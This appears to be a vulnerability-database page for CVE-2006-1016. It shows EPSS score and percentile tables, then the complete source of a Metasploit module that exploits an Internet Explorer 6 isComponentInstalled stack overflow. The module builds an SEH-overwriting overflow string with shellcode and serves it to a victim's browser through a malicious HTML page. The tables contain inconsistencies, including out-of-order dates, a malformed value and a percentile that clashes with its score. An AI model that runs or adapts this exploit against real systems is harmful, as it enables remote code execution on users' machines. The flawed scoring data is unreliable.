CVE-2006-1016 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	86.47%	–	–
2023-03-12	–	–	–	80.45%	–
2023-03-26	–	–	–	79.55%	–
2023-06-11	–	–	–	77.98%	–
2023-07-30	–	–	–	75.56%	–
2023-09-17	–	–	–	76.59%	–
2023-11-12	–	–	–	84.4%	–
2024-01-28	–	–	–	88.04%	–
2024-02-11	–	–	–	88.04%	–
2024-06-02	–	–	–	88.04%	–
2024-06-02	–	–	–	88.04%	–
2024-06-30	–	–	–	88.84%	–
2024-12-22	–	–	–	75.8%	–
2025-02-16	–	–	–	70.62%	–
2025-01-19	–	–	–	75.8%	–
2025-02-16	–	–	–	70.62%	–
2025-03-18	–	–	–	–	76.52%
2025-03-18	–	–	–	–	76.52,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	1%
2023-03-12	98%
2023-03-26	98%
2023-06-11	98%
2023-07-30	98%
2023-09-17	98%
2023-11-12	98%
2024-01-28	98%
2024-02-11	99%
2024-06-02	99%
2024-06-02	99%
2024-06-30	99%
2024-12-22	98%
2025-02-16	98%
2025-01-19	98%
2025-02-16	98%
2025-03-18	99%
2025-03-18	99%

## # $Id: ie_iscomponentinstalled.rb 9262 2010-05-09 17:45:00Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Seh include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, 'Name' => 'Internet Explorer isComponentInstalled Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in Internet Explorer. This bug was patched in Windows 2000 SP4 and Windows XP SP1 according to MSRC. }, 'License' => MSF_LICENSE, 'Author' => [ 'hdm', ], 'Version' => '$Revision: 9262 $', 'References' => [ [ 'CVE', '2006-1016' ], [ 'OSVDB', '31647' ], [ 'BID', '16870' ], ], 'Payload' => { 'Space' => 512, 'BadChars' => "\x00\x5c\x0a\x0d\x22", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ ['Windows XP SP0 with Internet Explorer 6.0', { 'Ret' => 0x71ab8e4a } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Feb 24 2006')) end def on_request_uri(cli, request) # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) # Create the overflow string pattern = rand_text_alpha(8192) # Smash the return address with a bogus pointer pattern[744, 4] = [0xffffffff].pack('V') # Handle the exception :-) seh = generate_seh_payload(target.ret) pattern[6439, seh.length] = seh # Build out the HTML response page var_client = rand_text_alpha(rand(30)+2) var_html = rand_text_alpha(rand(30)+2) content = %Q| <html> <head> <script> function window.onload() { #{var_client}.style.behavior = "url(#default#clientCaps)"; #{var_client}.isComponentInstalled( "__pattern__" , "componentid" ); } </script> </head> <body id="#{var_client}"> #{var_html} </body> </html> | content = Rex::Text.randomize_space(content) # Insert the shellcode content.gsub!('__pattern__', pattern) print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response_html(cli, content) # Handle the payload handler(cli) end end